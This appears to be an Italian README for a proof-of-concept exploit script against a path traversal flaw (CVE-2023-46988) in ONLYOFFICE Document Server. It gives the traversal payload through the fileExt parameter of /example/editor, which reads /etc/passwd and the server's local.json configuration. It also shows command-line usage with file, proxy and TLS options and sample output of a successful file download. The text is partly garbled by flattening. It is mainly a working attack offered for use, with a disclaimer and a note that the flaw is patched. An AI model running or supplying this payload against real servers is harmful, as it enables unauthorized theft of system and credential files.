
CVE-2023-46988: Exploit di Path Traversal in ONLYOFFICE
Questo script sfrutta una vulnerabilità di path traversal in ONLYOFFICE Document Server (CVE-2023-46988) che consente a utenti non autorizzati di copiare file arbitrari dal server. La vulnerabilità è presente nell'endpoint /example/editor, dove il parametro fileExt può essere manipolato per accedere a file sensibili di sistema e di configurazione.
Questo strumento è destinato esclusivamente a scopi educativi e di ricerca autorizzata sulla sicurezza.
L'uso non autorizzato contro sistemi senza permesso esplicito è illegale e non etico.
/etc/passwd/etc/onlyoffice/documentserver/local.json (contiene )--file.--proxy).--verify).python onlyoffice_exploit.py http://localhost
Questo recupera:
/etc/passwd/etc/onlyoffice/documentserver/local.json/etc/hosts)python onlyoffice_exploit.py http://localhost --file /etc/hosts
127.0.0.1:8080)python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
python onlyoffice_exploit.py https://example.local --verify
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
/example/editor con un parametro fileExt malizioso:
GET /example/editor?fileExt=../../../../../../../../etc/passwd
/example/download?fileName=<nome_file_estratto>.[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd
ONLYOFFICE ha corretto questa vulnerabilità nell'aggiornamento di febbraio 2024.
Gli utenti dovrebbero aggiornare all'ultima versione per proteggere i propri server.
Questo progetto è concesso in licenza con la MIT License – consulta il file LICENSE per i dettagli.